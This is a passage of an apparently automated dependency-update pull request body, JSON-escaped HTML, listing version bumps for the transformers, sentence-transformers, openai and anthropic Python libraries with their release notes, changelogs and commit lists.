href=\"https://redirect.github.com/huggingface/transformers/issues/46237\"\u003e#46237\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/e820678256f22e7647e39e8b7ed040fa81b7b872\"\u003e\u003ccode\u003ee820678\u003c/code\u003e\u003c/a\u003e Add Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/595721c44cb14db37fa504903e2edd5e9f0eba43\"\u003e\u003ccode\u003e595721c\u003c/code\u003e\u003c/a\u003e Pass library_name/version to Hub calls via a shared HfApi (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46318\"\u003e#46318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.7.0...v5.10.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sentence-transformers` from 5.4.1 to 5.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/sentence-transformers/releases\"\u003esentence-transformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.1 - Small Multimodal patch\u003c/h2\u003e\n\u003cp\u003eThis patch release fixes a small quirk with multimodal inference when using single-key multimodal inputs like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003e# Training + Inference\r\npip install sentence-transformers[train]==5.5.1\r\n\u003ch1\u003eInference only, use one of:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers==5.5.1\npip install sentence-transformers[onnx-gpu]==5.5.1\npip install sentence-transformers[onnx]==5.5.1\npip install sentence-transformers[openvino]==5.5.1\u003c/p\u003e\n\u003ch1\u003eMultimodal dependencies (optional):\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[image]==5.5.1\npip install sentence-transformers[audio]==5.5.1\npip install sentence-transformers[video]==5.5.1\u003c/p\u003e\n\u003ch1\u003eOr combine as needed:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[train,onnx,image]==5.5.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003ch2\u003eBug fixed\u003c/h2\u003e\n\u003cp\u003ePreviously, inference like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e or \u003ccode\u003emodel.encode([{\u0026quot;image\u0026quot;: ...}, ...])\u003c/code\u003e would be inferred as the \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e modality, which differed from the inferred modality of \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e for just \u003ccode\u003emodel.encode(my_image)\u003c/code\u003e or \u003ccode\u003emodel.encode([my_image, my_image_2, ...])\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis results in confusing errors if the model doesn't have a \u003ccode\u003emodality_config\u003c/code\u003e mapping for \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e in addition to \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, so now a single-key multimodal dict is collapsed to the bare modality (just \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e in this example).\u003c/p\u003e\n\u003cp\u003eThis affected this code:\u003c/p\u003e\n\u003cpre lang=\"python\"\u003e\u003ccode\u003e\r\nfrom sentence_transformers import SentenceTransformer\r\n\u003cp\u003emodel = SentenceTransformer('BAAI/BGE-VL-base', trust_remote_code=True)\nembedding = model.encode({\u0026quot;image\u0026quot;: \u0026quot;\u003ca href=\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;%7D\"\u003ehttps://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;}\u003c/a\u003e)\nprint(embedding.shape)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eWhich previously failed as the model only implements a path for \u003ccode\u003e\u0026quot;text\u0026quot;\u003c/code\u003e, \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, and \u003ccode\u003e(\u0026quot;image\u0026quot;, \u0026quot;text\u0026quot;)\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eAll Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Collapse single-key multimodal dicts to bare modality by \u003ca href=\"https://github.com/tomaarsen\"\u003e\u003ccode\u003e@​tomaarsen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\"\u003ehttps://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.0 - Training Agent Skill, EmbedDistillLoss, and ADRMSELoss\u003c/h2\u003e\n\u003cp\u003eThis release ships the \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill, adds two new training losses, and brings a long list of robustness and correctness fixes.\u003c/p\u003e\n\u003cp\u003eThe new \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill lets AI coding agents (Claude Code, Codex, Cursor, Gemini CLI, ...) drive end-to-end training and fine-tuning across all three model types. \u003ccode\u003eEmbedDistillLoss\u003c/code\u003e is a new embedding-level knowledge distillation loss for \u003ccode\u003eSentenceTransformer\u003c/code\u003e: it aligns a student model's embeddings with pre-computed teacher embeddings, an alternative to the score-based distillation provided by \u003ccode\u003eMarginMSELoss\u003c/code\u003e and \u003ccode\u003eDistillKLDivLoss\u003c/code\u003e. \u003ccode\u003eADRMSELoss\u003c/code\u003e is a new listwise learning-to-rank loss for \u003ccode\u003eCrossEncoder\u003c/code\u003e from the Rank-DistiLLM paper. \u003ccode\u003eencode()\u003c/code\u003e and \u003ccode\u003epredict()\u003c/code\u003e also gain a per-call \u003ccode\u003eprocessing_kwargs\u003c/code\u003e override, and more.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/ce3ec6d87f25b2d1cccb0a20f8fd495dad5c30fb\"\u003e\u003ccode\u003ece3ec6d\u003c/code\u003e\u003c/a\u003e Release v5.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/610a7c5ccfdfccc19933900feba0206f2e76bf59\"\u003e\u003ccode\u003e610a7c5\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003efix\u003c/code\u003e] Collapse single-key multimodal dicts to bare modality (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/f9f3269c7bd548555b7273a5378d52eeaa5d6286\"\u003e\u003ccode\u003ef9f3269\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into v5.5-release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/02dc21d77dfd22b5816fb5398877253100b89b43\"\u003e\u003ccode\u003e02dc21d\u003c/code\u003e\u003c/a\u003e Update index tip for v5.5.0 (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3774\"\u003e#3774\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/833828b3dae0cf9e6943ae01b9c9645f883daf3b\"\u003e\u003ccode\u003e833828b\u003c/code\u003e\u003c/a\u003e Release v5.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/98ac358861359fd275824732e5f658b2f4ca6c78\"\u003e\u003ccode\u003e98ac358\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Load models in float32 in the training examples \u0026amp; docs (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3773\"\u003e#3773\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/d8ee0410ba140f41aa2ac0735a97e1d690dd2df5\"\u003e\u003ccode\u003ed8ee041\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use modality-neutral terms (input, document) in loss docs \u0026amp; docstrin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/4c6850e444e5bcedfb026e9d674ae18c19ab5233\"\u003e\u003ccode\u003e4c6850e\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003eexamples\u003c/code\u003e] Avoid LoggingHandler, silence httpx in examples (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3771\"\u003e#3771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/1418823d250763751ea95212dfb9ecaa919f5e92\"\u003e\u003ccode\u003e1418823\u003c/code\u003e\u003c/a\u003e docs: fix grammar in parallel-sentence-mining README (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3769\"\u003e#3769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/22a383d3644cfaa40038adb0b70a9320f7f73d36\"\u003e\u003ccode\u003e22a383d\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use direct class imports in examples \u0026amp; docs (drop `losses.MSELoss(.....\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.4.1...v5.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `openai` from 2.32.0 to 2.41.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/releases\"\u003eopenai's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.41.0\u003c/h2\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.40.0\u003c/h2\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.39.0\u003c/h2\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.38.0\u003c/h2\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.37.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/blob/main/CHANGELOG.md\"\u003eopenai's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.37.0 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.36.0...v2.37.0\"\u003ev2.36.0...v2.37.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2d955a1ac69df0288b8072bbcd25905639e9b2ed\"\u003e\u003ccode\u003e2d955a1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3359\"\u003e#3359\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/519cd027919fa5b73bd8fe237e80c7a01b3e0b2f\"\u003e\u003ccode\u003e519cd02\u003c/code\u003e\u003c/a\u003e release: 2.41.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e\u003ccode\u003e87e46c2\u003c/code\u003e\u003c/a\u003e feat(api): responses.moderation and chat_completions.moderation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a28a3f6aa34f5ac6fcc2fafeb50112f2140c45ae\"\u003e\u003ccode\u003ea28a3f6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3352\"\u003e#3352\u003c/a\u003e from openai/release-please--branches--main--changes-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/db6ccafa7b74b72caefbda6fb63bd5c904521770\"\u003e\u003ccode\u003edb6ccaf\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/2264f700dad91e4f570eb7c0a6f10bbd22d34520\"\u003e\u003ccode\u003e2264f70\u003c/code\u003e\u003c/a\u003e release: 2.40.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e\u003ccode\u003e4d5bfde\u003c/code\u003e\u003c/a\u003e fix(api): allow setting bedrock api keys on the client directly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/ccef1436d9f52b5014597047e450eef543a87540\"\u003e\u003ccode\u003eccef143\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/openai/openai-python/issues/3326\"\u003e#3326\u003c/a\u003e from openai/codex/bedrock-responses-review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/a50ff0a19084306a09012ff85f730ea2c129eef9\"\u003e\u003ccode\u003ea50ff0a\u003c/code\u003e\u003c/a\u003e Fix Bedrock with_options overrides\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/openai/openai-python/commit/fdf4901e301fa01b368ede0b5b407dca42f07acc\"\u003e\u003ccode\u003efdf4901\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/openai/openai-python/compare/v2.32.0...v2.41.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `anthropic` from 0.96.0 to 0.107.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/releases\"\u003eanthropic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.107.1\u003c/h2\u003e\n\u003ch2\u003e0.107.1 (2026-06-07)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.107.0...v0.107.1\"\u003ev0.107.0...v0.107.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003efoundry:\u003c/strong\u003e send x-api-key header for API-key auth (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/62\"\u003e#62\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/13381413d22ad14d85e66836c67cc8a13bd2b7bd\"\u003e1338141\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.107.0\u003c/h2\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.106.0\u003c/h2\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.105.2\u003c/h2\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca 